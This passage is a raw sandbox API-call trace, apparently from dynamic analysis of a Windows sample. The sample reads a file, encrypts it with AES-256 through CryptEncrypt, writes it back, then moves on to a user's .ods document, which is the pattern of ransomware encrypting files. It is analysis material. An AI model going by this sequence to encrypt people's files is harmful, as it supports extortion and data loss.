lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0076.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0076.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0076.167] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0076.167] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x1149, lpOverlapped=0x0) returned 1 [0076.169] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0076.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0076.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1149) returned 0x440b3b8 [0076.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0076.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0076.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1149) returned 0x440c510 [0076.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0076.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.172] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0076.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0076.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1149) returned 0x440b3b8 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x440b3b8 | out: hHeap=0x1780000) returned 1 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.173] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0076.173] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0076.173] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0076.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1149) returned 0x440b3b8 [0076.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0076.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0076.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26e0 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0076.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1149) returned 0x440d668 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0076.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.175] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0076.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0076.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.176] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.176] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.176] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0076.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.178] CryptGetKeyParam (in: hKey=0x41ac6c0, dwParam=0x7, pbData=0x43e2530, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2530*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0076.178] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.178] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.178] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca910, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.179] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x1149, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x1150) returned 1 [0076.179] CharLowerBuffW (in: lpsz="byte[4433]", cchLength=0xa | out: lpsz="byte[4433]") returned 0xa [0076.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabe0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.179] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x440e7c0*, pdwDataLen=0x144e790*=0x1149, dwBufLen=0x1150 | out: pbData=0x440e7c0*, pdwDataLen=0x144e790*=0x1150) returned 1 [0076.179] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.179] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.181] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.181] WriteFile (in: hFile=0x298, lpBuffer=0x440c510*, nNumberOfBytesToWrite=0x1150, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x440c510*, lpNumberOfBytesWritten=0x144f194*=0x1150, lpOverlapped=0x0) returned 1 [0076.183] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.183] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.183] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca5b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0076.183] CryptDestroyKey (hKey=0x41ac6c0) returned 1 [0076.183] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.183] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.183] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.183] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.183] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.183] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.183] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.183] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0076.184] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0076.184] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.184] FreeLibrary (hLibModule=0x756e0000) returned 1 [0076.184] CloseHandle (hObject=0x258) returned 1 [0076.184] CloseHandle (hObject=0x298) returned 1 [0076.186] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods", lpFilePart=0x0) returned 0x2c [0076.186] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods" (normalized: "c:\\users\\fd1hvy\\documents\\czdg7aga6_wtvh.ods")) returned 0x20 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2160 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0076.186] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e188980, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x869ba5c0, ftLastAccessTime.dwHighDateTime=0x1d5e984, 